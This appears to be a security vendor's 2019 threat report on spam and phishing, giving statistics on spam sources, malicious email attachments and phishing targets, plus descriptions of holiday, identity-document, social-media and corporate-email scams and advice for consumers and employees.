In 2019, as in the year before, China retained its crown as the top spam-originating country. Its share grew significantly from the previous year (up 9.57 p.p.) to 21.26%. It remains ahead of the US (14.39%), whose share increased by 5.35 p.p. In third place was Russia (5.21%).

Fourth position went to Brazil (5.02%), despite shedding 1.07 p.p. Fifth place in 2019 was claimed by France (3.00%), and sixth by India (2.84%), which ranked the same as the year before.  Vietnam (2.62%), fourth in the previous reporting period, moved down to seventh.

The TOP 10 is rounded out by Germany, dropping from third to eighth (2.61%, down by 4.56 p.p.), Turkey (2.15%), and Singapore (1.72%).

Sources of spam by country, 2019 (download)

Spam e-mail size

In 2019, the share of very small e-mails continued to grow, but less dramatically than the year before — by just 4.29 p.p. to 78.44%. Meanwhile, the share of e-mails sized 2–5 KB decreased against 2018 by 4.22 p.p. to 6.42%.

Spam e-mails by size, 2019 (download)

The share of larger e-mails (10–20 KB) changed insignificantly, down by 0.84 p.p. But there was more junk mail sized 20–50 KB: such messages accounted for 4.50% (+1.68 p.p) In addition, the number of 50–100 KB sized e-mails rose by almost 1 p.p, amounting to 1.81%.

Malicious mail attachments

Malware families

Number of Mail Anti-Virus triggerings, 2019 (download)

In 2019, our security solutions detected a total of 186 005 096 malicious email attachments. November was the most active month with 19 million Mail Anti-Virus triggerings, while December was the “calmest” — with 7 million fewer.

TOP 10 malware families, 2019 (download)

In 2019, like the year before it, Exploit.Win32.CVE-2017-11882 malicious objects were the most commonly encountered malware (7.24%). They exploited a vulnerability in Microsoft Office that allowed arbitrary code to be executed without the user’s knowledge.

In second place is the Trojan.MSOffice.SAgent family (3.59%), whose members also attack Microsoft Office users. This type of malware consists of a document with a built-in VBA script that secretly loads other malware using PowerShell when the document is opened.

The Worm.Win32.WBVB family (3.11%), which includes executable files written in Visual Basic 6 and classed as untrusted by KSN, rose from fourth place in the rating to third.

Backdoor.Win32.Androm.gen (1.64%), which ranked second in the previous reporting period, dropped to fourth position. This modular backdoor is most often used to download malware onto the victim’s machine.

Fifth place in 2019 was taken by the Trojan.Win32.Kryptik family (1.53%). This verdict is assigned to Trojans that use anti-emulation, anti-debugging, and code obfuscation to make them difficult to analyze.

Trojan.MSIL.Crypt.gen (1.26%) took sixth place, while Trojan.PDF.Badur (1.14%) — a PDF that directs the user to a potentially dangerous site — climbed to seventh.

Eighth position fell to another malicious DOC/DOCX document with a malicious VBA script inside — Trojan-Downloader.MSOffice.SLoad.gen (1.14%), which, when opened, may download ransomware onto the victim’s computer.

In ninth place is Backdoor.Win32.Androm, and propping up the table is Trojan.Win32.Agent (0.92%).

Countries targeted by malicious mailings

As in the previous year, Germany took first place in 2019. Its share remained virtually unchanged: 11.86% of all attacks (+0.35 p.p.). Second place was claimed jointly by Russia and Vietnam (5.77% each) — Russia held this position in the previous reporting period, while Vietnam’s rise to the TOP 3 came from sixth position.

Countries targeted by malicious mailings, 2019 (download)

Lagging behind by just 0.2 p.p. is Italy (5.57%), while the UAE is in fifth place (4.74%), Brazil in sixth (3.88%), and Spain in seventh (3.45%). The TOP 10 is rounded out by the practically neck-and-neck India (2.67%), Mexico (2.63%), and Malaysia (2.39%).

Statistics: phishing

In 2019, the Anti-Phishing system was triggered 467 188 119 times on Kaspersky user computers as a result of phishing redirection attempts (15,277,092 fewer than in 2018). In total, 15.17% of our users were attacked.

Organizations under attack

The rating of organizations targeted by phishing attacks is based on the triggering of the heuristic component in the Anti-Phishing system on user computers. This component detects all instances when the user tries to follow a link in an e-mail or on the Internet to a phishing page in cases when such link has yet to be added to Kaspersky’s databases.

Rating of categories of organizations attacked by phishers

In contrast to 2018, in this reporting period the largest share of heuristic component triggers fell to the Banks category. Its slice increased by 5.46 p.p. to 27.16%. Last year’s leader, the Global Internet Portals category, moved down a rung to second. Against last year, its share decreased by 3.60 p.p. (21.12%). The Payment Systems category remained in third place, its share in 2019 amounting to 16.67% (-2.65 p.p.).

Distribution of organizations subject to phishing attacks by category, 2019 (download)

Attack geography

Countries by share of attacked users

This period’s leader by percentage of attacked unique users out of the total number of users was Venezuela (31.16%).

Percentage of users on whose computers the Anti-Phishing system was triggered out of all Kaspersky users in the country, 2019 (download)

TOP 10 countries by share of attacked users

TOP 10 countries by share of attacked users

Last year’s leader, Brazil (30.26%), this year found itself in second place, shedding 1.98 p.p. and ceding top spot to Venezuela (31.16%), which moved up from ninth position, gaining 11.27 p.p. In third place was TOP 10 newcomer Greece (25.96%).

Wrap-up

TV premieres, high-profile sporting events, and the release of new gadgets were exploited by scammers to steal users’ personal data or money.

In the search for new ways to bypass spam filters, attackers are developing new methods of delivering their messages. This year, they made active use of various Google services, as well as popular social networks (Instagram) and video hosting sites (YouTube).

Cybercriminals continue to use the topic of finance in schemes aimed at gaining access to users’ personal data, infecting computers with malware, or stealing funds from victims’ accounts.

The main trend of 2019 was the rise in the number of attacks on the corporate sector. Fraudulent schemes previously used to repeatedly attack ordinary users changed direction, adding new intricacies to cybercriminal tactics.

Pre-holiday spam

Easy money

In the run-up to Christmas and New Year, scam е-mails mentioning easy pickings, lottery winnings, and other cash surprises are especially popular. All the more so given how simple it is to adapt existing schemes simply by mentioning the holiday in the subject line.

For example, one scam е-mail with the subject line “Xsmas gift” or “Xmas offer” talks about a “special donation” and provides a contact е-mail address for more information. Recipients who respond are lured into parting with a sum of money through social engineering.

Scammers offering “Xmas gifts” are very persistent

Another Christmas-related scheme aims to steal cryptocurrency. Scammers offer the chance to earn some bitcoins before the holiday period using “secret” software that can be downloaded via a link:

After downloading and running the program (the malware Hoax.Win32.Agent.gen.), the user is prompted to enter their cryptowallet credentials and wait until the request is executed.

Next, the user is informed that the cryptocurrency will be credited to their account immediately after they pay a transfer fee. The result is predictable — the user earns no bitcoins, and the “fee” goes to the scammers.

Extortion

Standard extortion schemes are also adapted for the festive period. For instance, the authors of this е-mail threaten to spoil the victim’s Christmas by smearing them as a pedophile. To prevent this, the recipient needs to transfer the equivalent of $5,000 in bitcoin to the extorters:

Malicious mailings and the corporate sector

Corporate е-mail addresses are also on the cybercriminal radar. To extract confidential information from recipients, or install malware, scammers mask malicious е-mails as business correspondence. In the pre-holiday period, when sales are on the rise, retail finds itself in a special risk zone. E-mails with malicious attachments (DOC or XLS) are sent under the guise of messages related to orders for goods.

For example, hidden in the attachment to this е-mail is Trojan-Downloader.MSOffice.SLoad.sb, which in turn downloads other malware to the victim’s computer:

Malicious attachments can also be disguised as invoices and payment notices. The archive attached to this е-mail actually contains the Trojan-PSW.MSIL.Agensla.hdt stealer, which harvests logins and passwords, and then sends them to the cybercriminals:

Statistics

The share of spam as a percentage of world email traffic gradually increased throughout the entire Q4 2019 and in December amounted to 57.26%. Thus it almost reached the maximum value for the second half of the year — 57.78% (which we recorded in August).

The share of spam in global email traffic, Q3 and Q4 2019

A similar picture was observed in Russia. However, in the fall the growth was less pronounced:
From September to November the amount of spam traffic grew by a total of 0.86 percentage points (compared to a growth rate of 1.14 percentage points for the entire world) to reach 51.15% of total email volume. However, during the last month of the year, the share of spam jumped dramatically by 3.36 p.p. (compared to only 1.44% for the entire world) and exceeded even the summer indicators (54.51% in December as opposed to 53.5 % in July and 53.76% in August). Most likely, such a sharp rise can be attributed to the traditional uptick in holiday season activity by spammers.

The share of spam in Russian email traffic, Q3 and Q4 2019

In the Asia-Pacific region as a whole, we also observed an increase in the amount of spam in email traffic from September (50.19%) to December (52.62%). As you can see from the diagram, the increase is quite gradual. At the same time, the volume of junk messages reached a peak in January, when their share made 55.48%. This is most likely due to the lunar new year, which is celebrated in most of the countries of the region and which this year fell on January 25.

The share of spam in email traffic in the Asia-Pacific Region, July 2019 – January 2020

Christmas/New Year phishing

Fake websites

Phishers lured users onto fake pages with the promise of favorable T&Cs, discounts, gifts. For example, they tried to gain access to Amazon Prime accounts by offering Christmas promotions supposedly on behalf of the service; to take part, users were asked to enter their account credentials.

Besides fake versions of real websites, non-existent stores popped up online offering huge discounts. Their catalogs typically contain a very limited range of premium-class products, and the websites themselves look more like landing pages. A characteristic attribute of such sites is a countdown timer showing how much time is left before the “promotion” ends.

In addition to expensive goods, scammers offer libido-boosting drugs — also at great discounts. The product range in such “medical stores” is not very wide:

The information about the domain shows that it was registered recently, which is another indicator of fakeness.

Nor did scammers overlook gamers. For instance, we discovered phishing pages mimicking the Warface multiplayer website. In honor of New Year, one of the fakes promised gamers 30-days’ free use of some powerful weapons, while another presented a golden rifle for joining Santa’s helpers. To receive either “prize,” players had to enter their username and password on a fake login page, thereby giving the scammers access to their account. Accounts with a high in-game rank and unique, paid-for weapons can fetch a good price.

Cash gifts

Fake websites promising easy money were also given a festive makeover: they offered New Year payouts to the poor, sponsorship gifts, giveaways, etc. As usual in such cases, visitors are invited to complete a simple task, for example, take a survey and enter some personal data. After a five-digit sum seemingly ready for transfer is displayed on screen, the victim is asked to pay a service fee — which, of course, goes straight to the scammers.

To add credibility and urgency, the attackers place eye-catching information to nudge the victim into acting: notifications about the limited nature of the offer, number of visitors who are currently filling in the form, or a “bonuses” countdown:

Crypto fans did not escape phishers’ attention either. It was shortly before Christmas that we came across a scheme offering a festive giveaway of bitcoins and ether supposedly from the Binance crypto exchange. Naturally, to receive a “gift” it was necessary to confirm participation by transferring 5 BTC or 50 ETH to the “organizers.”

To promote the “event,” the scammers posted an article about it on the Medium platform with dozens of enthusiastic comments from “winning” users.

Statistics

In Q4 2019, the share of attacks that sought to steal financial data and accounts at online banks and stores out of the total number of phishing attacks amounted to 52.61%. This exceeds both the indicator for the previous quarter (43.19%) and the indicator for the whole year (51.4%). We observed a similar situation in 2018 and 2017, with the only difference being that the jump was more noticeable last year — from 44.67% on average for the entire year and 34.67% in Q3 to 51.18% in Q4.

The share of phishing attacks on online stores and financial services during Q3 and Q4 of 2017, 2018, and 2019

It is curious that by the end of 2019, fraudsters had partially lost interest in electronic payment services. For the first time in three years, in Q4 the share of phishing attacks on such resources decreased by 1.21 percentage points compared to the previous reporting period and amounted to 14%.

The share of phishing attacks on online stores and financial services during Q3 and Q4 of 2017, 2018, and 2019

At the same time, the popularity of non-financial categories of websites also fell, and in the ranking of the most popular attack targets for the last quarter, payment services rose from fourth to third place, displacing social networks and blogs, which were attacked only in 5.89% of cases. The leading targets by number of phishing attacks in Q4 were bank resources (29.73%), ahead of global Internet portals (22.81%), which had led the ranking during the previous quarter (23.81%).

The distribution of organizations whose users were attacked by phishers by category during Q4 2019

We analyzed the number of attacks on major commercial platforms during the period of November 11 to December 31. The number of attacks during this period jumped as expected shortly before Black Friday, which occurred on November 29, and remained at a high level until the Christmas and New Year holidays. In particular, the number of phishing schemes that were perpetrated under the Ebay brand since mid-November has remained at 1% (of the total number of attacks that used the brand for the specified period), and as of November 27, this figure was 3.15%, and as of December 2, it grew by almost one-and-a-half percentage points to 4.63%.

The distribution of phishing attacks using the Ebay brand by day, November 11, 2019 — December 31, 2019

We observed a similar situation with phishing attacks that utilized the Alibaba brand:
The peak of activity occurred on November 27 and lasted until December 4. In both cases there was a short break in fraudulent activity in the middle of December: On December 15 it fell practically to zero, but it again began to rise with the approach of Christmas and New Year.

The distribution of phishing attacks using the Alibaba brand by day, November 11, 2019 — December 31, 2019

Tips and recommendations

So as not to fall for scams and tricks, it is important to take easy money offers with a massive pinch of festive salt.

If you are a consumer:

• Remember that the only free cheese is in a mousetrap. If you are suddenly offered a reward for taking part in a survey, or a huge discount on luxury goods, be very wary.
• Do not follow links in е-mails or messages in social networks if you have even the slightest doubt.
• Be very careful when making purchases on unfamiliar websites. If an online store has few products, it might not be real. If the URL of a well-known website seems strange, that too is cause for concern.
• Do not install software from unknown sources advertised in е-mails.
• Use a reliable security solution.

If you are a company employee:

• Read incoming е-mails from strangers with a critical eye. To spot malicious content in business correspondence, we recommend that you first check the sender address and autosignature. If they do not match, it should raise a red flag. It is also worth comparing the information in the е-mail with that on the website of the company in whose name the message was sent — the contact details might be completely different.

Quarterly highlights

Amazon Prime

In Q3, we registered numerous scam mailings related to Amazon Prime. Most of the phishing emails with a link to a fake Amazon login page offered new prices or rewards for buying things, or reported problems with membership, etc. Against the backdrop of September’s Prime Day sale, such messages were plausible.

Scammers also used another fraudulent scheme: An email informed victims that their request to cancel Amazon Prime had been accepted, but if they had changed their mind, they should call the number in the message. Fearing their accounts may have been hacked, victims phoned the number — this was either premium-rate and expensive, or, worse, during the call the scammers tricked them into revealing confidential data.

Scammers collect photos of documents and selfies

This quarter we detected a surge in fraud related to stealing photos of documents and selfies with them (often required for registration or identification purposes). In phishing emails seemingly from payment systems and banks, users were asked under various pretexts to confirm their identity by going to a special page and uploading a selfie with an ID document. The fake sites looked quite believable, and provided a list of necessary documents with format requirements, links to privacy policy, user agreement, etc.

Some scammers even managed without a fake website. For instance, in summer Italian users were hit by a spam attack involving emails about a smartphone giveaway. To receive the prize, hopefuls had to send a photograph of an ID document and a selfie to the specified email address. To encourage victims to respond, the scammers stated that the offer would soon expire.

To obtain copies of documents, scammers also sent fake Facebook messages in which recipients were informed that access to their accounts had been restricted due to complaints about the content of some posts. To prevent their account from being deleted, they were instructed to send a photo or scan of a driving license and other ID documents with a selfie, plus medical insurance details.

YouTube and Instagram

Scammers continue to exploit traditional schemes on new platforms, and Q3 was a bumper quarter in this regard. For instance, YouTube ads appeared offering the viewer the chance to earn a lot of quick and easy money. The video explained to users that they had to take a survey and provide personal details, after which they would receive a payout or a gift from a large company, etc. To add credibility, fake reviews from supposedly “satisfied customers” were posted under the video. What’s more, the enthusiastic bot-generated comments did not appear all in one go, but were added gradually to look like a live stream.

All the user had to do was follow the link under the video and then follow the steps in the video instructions. Sure, to receive the handout, a small “commission fee” or payment to “confirm the account” was required.

Similar schemes did the rounds on Instagram. Advertising posts in the name of various celebrities (fake accounts are easily distinguished from real ones by the absence of a blue tick) were often used to lure fans with prize draws or rewards for completing a paid survey. As with the YouTube videos, there were plenty of fake glowing comments under such posts. Given that such giveaways by stars are not uncommon, inattentive users could swallow the bait.

Back to school

In Q3, we registered a series of attacks related in one way or another to education. Phishers harvested usernames and passwords from the personal accounts of students and lecturers using fake pages mimicking university login pages.

The scammers were looking not for financial data, but for university research papers, as well as any personal information that might be kept on the servers. Data of this kind is in high demand on the darknet market. Even data that seems useless at first can be used by cybercriminals to prepare a targeted attack.

One way to create phishing pages is to hack into legitimate resources and post fraudulent content on them. In Q3, phishers hacked school websites and created fake pages on them to mimic login forms for commonly used resources.

Scammers also tried to steal usernames and passwords for the mail servers of educational service providers. To do so, they mailed out phishing messages disguised as support service notifications asking recipients to confirm that the mail account belonged to them.

Apple product launch

In September, Apple unveiled its latest round of products, and as usual the launch was followed by fans and scammers alike — we detected phishing emails in mail traffic aimed at stealing Apple ID authentication data.

Scammers also harvested users’ personal data by sending spam messages offering free testing of new releases.

The number of attempts to open fake websites mentioning the Apple brand rose in the runup to the unveiling of the new product line and peaked on the actual day itself:

Number of attempts to open Apple-related phishing pages, September 2019 (download)

Attacks on pay TV users

To watch TV or record live broadcasts in the UK, a license fee is payable. This was exploited by spammers who sent out masses of fake license expiry/renewal messages. What’s more, they often used standard templates saying that the license could not be renewed because the bank had declined the payment.

The recipient was then asked to verify (or update) their personal and/or payment details by clicking on a link pointing to a fake data entry and payment form.

Spam through website feedback forms

The website of any large company generally has one or even several feedback forms. These can be used to ask questions, express wishes, sign up for company events, or subscribe to newsletters. But messages sent via such forms often come not only from clients or interested visitors, but from scammers too.

There is nothing new about this phenomenon per se, but it is interesting to observe how the mechanism for sending spam through forms has evolved. If previously spammers targeted company mailboxes linked to feedback forms, now fraudsters use them to send spam to people on the outside.

This is possible because some companies do not pay due attention to website security, allowing attackers to bypass simple CAPTCHA tests with the aid of scripts and to register users en masse using feedback forms. Another oversight is that the username field, for example, accepts any text or link. As a result, the victim whose mailing address was used receives a legitimate confirmation of registration email, but containing a message from the scammers. The company itself does not receive any message.

Such spam started to surge several years ago, and has recently become even more popular — in Q3 services for delivering advertising messages through feedback forms began to be advertised in spam mailings.

Attacks on corporate email

Last quarter, we observed a major spam campaign in which scammers sent emails pretending to be voicemail notifications. To listen to the supposed message, the recipient was invited to click or tap the (phishing) link that pointed to a website mimicking the login page of a popular Microsoft service. It was a page for signing either into Outlook or directly into a Microsoft account.

The attack was aimed specifically at corporate mail users, since various business software products allow the exchange of voice messages and inform users of new ones via email.

It is worth noting that the number of spam attacks aimed specifically at the corporate sector has increased significantly of late. Cybercriminals are after access to employees’ email.

Another common trick is to report that incoming emails are stuck in the delivery queue. To receive these supposedly undeliverable messages, the victim is prompted to follow a link and enter their corporate account credentials on another fake login page, from where they go directly to the cybercriminals. Last quarter, our products blocked many large-scale spam campaigns under the guise of such notifications.

Statistics: spam

Proportion of spam in mail traffic

Share of spam in global mail traffic, Q2 and Q3 2019 (download)

In Q3 2019, the largest share of spam was recorded in August (57.78%). The average percentage of spam in global mail traffic was 56.26%, down 1.38 p.p. against the previous reporting period.

Sources of spam by country

Sources of spam by country, Q3 2019 (download)

The TOP 5 spam-source countries remain the same as last quarter, only their percentage shares are slightly different. China is in first place (20.43%), followed by the US (13.37%) and Russia (5.60%). Fourth position goes to Brazil (5.14%) and fifth to France (3.35%). Germany took sixth place (2.95%), followed — with a gap of less than 0.5 p.p. — by India (2.65%), Turkey (2.42%), Singapore (2.24%), and Vietnam (2.15%).

Spam email size

Spam email size, Q2 and Q3 2019 (download)

In Q3 2019, the share of very small emails (up to 2 KB) in spam decreased by 4.38 p.p. to 82.93%. The proportion of emails sized 5-10 KB grew slightly (by 1.52 p.p.) against the previous quarter to 3.79%.

Meanwhile, the share of 10-20 KB emails climbed by 0.26 p.p. to 2.24%. As for the number of 20-50 KB emails, their share changed more significantly, increasing by 2.64 p.p. (up to 4.74%) compared with the previous reporting period.

Malicious attachments in email

Number of Mail Anti-Virus triggerings, Q2 2019 – Q3 2019 (download)

In Q3 2019, our security solutions detected a total of 48,089,352 malicious email attachments, which is almost five million more than in Q2. July was the most active month with 17 million Mail Anti-Virus triggerings, while August was the “calmest” — with two million fewer.

TOP 10 malicious attachments in mail traffic, Q3 2019 (download)

In Q3, first place by prevalence in mail traffic went to the Office malware Exploit.MSOffice.CVE-2017-11882.gen (7.13%); in second place was the Worm.Win32.WBVB.vam worm (4.13%), and in third was another malware aimed at Microsoft Office users, Trojan.MSOffice.SAgent.gen (2.24%).

TOP 10 malware families, Q3 2019 (download)

As for malware families, the Backdoor.Win32.Androm family (7.49%) claimed first place.

In second place are Microsoft Office exploits from the Exploit.MSOffice.CVE-2017-11882.gen family (7.20%). And in third is Worm.Win32.WBVB.vam (4.60%).

Countries targeted by malicious mailings

Distribution of Mail Anti-Virus triggerings by country, Q3 2019 (download)

First place by number of Mail Anti-Virus triggerings in Q3 2019 was retained by Germany. Its score increased by 0.31 p.p. to 10.36%. Vietnam also remained in the TOP 3, rising to second position (5.92%), and Brazil came in third just a tiny fraction behind.

Statistics: phishing

In Q3 2019, the Anti-Phishing system prevented 105,220,094 attempts to direct users to scam websites. The percentage of unique attacked users was 11.28% of the total number of users of Kaspersky products worldwide.

Attack geography

The country with the largest share of users attacked by phishers in Q3 2019 was Venezuela (30.96%), which took second place in the previous quarter and has since added 5.29 p.p.

Geography of phishing attacks, Q3 2019 (download)

Having lost 3.53 p.p., Greece ranked second (22.67%). Third place, as in the last quarter, went to Brazil (19.70%).

^{* Share of users on whose computers the Anti-Phishing system was triggered out of all Kaspersky users in the country}

Organizations under attack

The rating of categories of organizations attacked by phishers is based on triggers of the Anti-Phishing component on user computers. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

For the first time this year, the share of attacks on organizations in the Global Internet Portals category (23.81%) exceeded the share of attacks on credit organizations (22.46%). Social networks (20.48%) took third place, adding 11.40 p.p. to its share.

Distribution of organizations subjected to phishing attacks by category, Q3 2019. (download)

In addition, the TOP 10 said goodbye to the Government and Taxes category.

Its place was taken by the Financial Services category, which unites companies providing services in the field of finance that are not included in the Banks or Payment Systems categories, which cover providers of insurance, leasing, brokerage, and other services.

Conclusion

The average share of spam in global mail traffic (56.26%) this quarter decreased by 1.38 p.p. against the previous reporting period, while the number of attempted redirects to phishing pages compared to Q2 2019 fell by 25 million to just over 105 million.

Top in this quarter’s list of spam-source countries is China, with a share of 20.43%. Our security solutions blocked 48,089,352 malicious mail attachments, while Backdoor.Win32.Androm became the most common mail-based malware family — its share of mail traffic amounted to 7.49%.